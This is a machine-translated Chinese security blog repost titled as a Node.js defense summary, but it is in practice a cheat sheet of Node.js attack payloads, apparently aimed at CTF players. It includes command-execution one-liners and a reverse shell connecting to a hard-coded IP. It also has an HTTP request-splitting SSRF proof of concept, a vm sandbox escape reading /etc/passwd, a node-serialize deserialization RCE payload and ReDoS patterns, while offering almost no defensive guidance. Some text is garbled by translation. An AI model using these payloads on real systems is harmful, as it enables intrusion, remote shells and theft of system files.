Nodejs防御总结

admin 2021年4月24日22:06:54评论47 views字数 3187阅读10分37秒阅读模式

Nodejs防御总结

命令执行

require('child_porcess').execSync('id');global.process.mainModule.constructor._load('child_process').execSync('id');require('fs').readdirSync('.').toString()require('fs').readFileSync('a.js','utf-8')require('fs').writeFileSync('message.txt','hello')({}).constructor.constructor// 反弹shell(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/sh", []);var client = new net.Socket();client.connect(8080, "10.17.26.64", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();

http拆分攻击

进攻原理

具体见这里

根据
此处,收缩范围在[6.0.0,6.15.0)和[8.0.0,8.14.0)版本以内部的nodejs都存在这个问题。

简而言之,突破原因是当http包在处理http请求路径时,替换使用了 latin1
单字节编码字符集,当我们的请求路径中包含多字节编码的unicode字符时,会被截断取最低字节。

例如 u0130
就会被截断为 u30


为了避免crlf注入,nodejs也会将输入的 rn
url编码为 %0d%0a
,但是我们可以通过上面的突破就可以绕过。

用 %C4%8D%C4%8A
代替 rn
就可以绕过


进攻利用

一般是用做SSRF,通过crlf注入,向服务器发送走私内容。一般使用绕过内网限制。

下面是一个突破性的POC,在存在裂缝的nodejs版本运行可以很形象的观察突破,扩展此处

const http = require('http')const server = http.createServer((req, res) => {console.log(req.url);res.end();});server.listen(8000, function() {http.get('http://127.0.0.1:8000/?param=xu{0120}HTTP/1.1u{010D}u{010A}Host:{u0120}127.0.0.1:8000u{010D}u{010A}u{010D}u{010A}GETu{0120}/private', function() {});});

沙箱逃逸

虚拟机

vm模块不是安全机制。不要使用它来运行不受信任的代码。

vm
官方文档
也已经说了它是一个不安全的模块,而它也很容易逃逸。

在javascript中 this
是对当前对象的一个引用,然后在vm中的 this
指点的就是vm一部分,说明已经是vm其他之外了。

用 .constructor.constructor
可以索引到Function,创建匿名函数。那么在这个匿名函数中的 this
就是外部的 this

const vm = require("vm");const result = vm.runInNewContext(`var process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);console.log(result)

这样就能取到沙箱外的过程,执行命令了。

虚拟机2

vm2
号称是能安全的执行不信任的代码的,只能在情况下只有Javascript内置对象和Buffer可以访问。它内部使用vm模块创建的插件,并通过JavaScript的代理机制防止逃逸出沙箱。

只要在运行过程中获取到任何一个外部的对象,就可以索引到外部的此。。这篇文章
是通过制造错误,引起外部报错,再捕获外部的报错实现逃逸的(已修复)。

XmiliaH
对很多个版本都有逃逸,但最新版本都已修复。

reDos进攻

正则回溯导致的Dos突破。

除了导致行为,还可以在某些环境下猜测被匹配的字符串。今年的xctf抗疫高校分享赛就有一道这样的题。

这里也有一个猜测字符串的例子

下面有两个收集到的有效载荷

/^((.*)+)+xxxx$/                 不以xxxx结尾则dos/^(?=xxxx)(((.*)*)*)*salt$/     以xxxx开头则dos

javascript原型链污染

大致原理和CTF译文分析我以前分析过,这里不多余述

其他

node_serialize进攻

在 node_modulesnode-serializelibserialize.js
中非常简单的代码

反序列化时,使用eval处理 _$$ND_FUNC$$_
开头的代码

var FUNCFLAG = '_$$ND_FUNC$$_';if(obj[key].indexOf(FUNCFLAG) === 0) {obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');直接注入就行

直接注入就行

var serialize = require('node-serialize');var payload = '{"rce":"_$$ND_FUNC$$_require('child_process').exec('ls /',function(error, stdout, stderr){console.log(stdout)})"}';serialize.unserialize(payload);

没有必要用IIFE

javascript大小写特性

在toUpperCase()函数中,字符 ı
会转换为 I
,字符 ſ
会转换 S
。在toLowerCase()函数中,字符 
会转换为 k

节点Js Unicode错误

blackhat
上提出来的,原理与分解攻击类似。因为内部使用UCS-2编码,也是在处理path时对unicode时对高位的截断。

例如 xFFx2E
会被截断为 x2E
,其中 xFFx2E
也就是 

例如 x01x25
会被截断为 x25
,其中 x01x25
也就是 ĥ

这个知识点在CSAW2017出了几道题,我测试发现老版本的nodejs仍然存在这个问题。

参考

https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html

https://xz.aliyun.com/t/7184

https://hpdoger.cn/2019/12/01/I-SOON2019-Membershop%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/

https://diary.shift-js.info/blind-regular-expression-injection/


https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

转发来源:https://www.colabug.com/

Nodejs防御总结


本文始发于微信公众号(必火安全):Nodejs防御总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月24日22:06:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nodejs防御总结http://cn-sec.com/archives/207307.html

发表评论

匿名网友 填写信息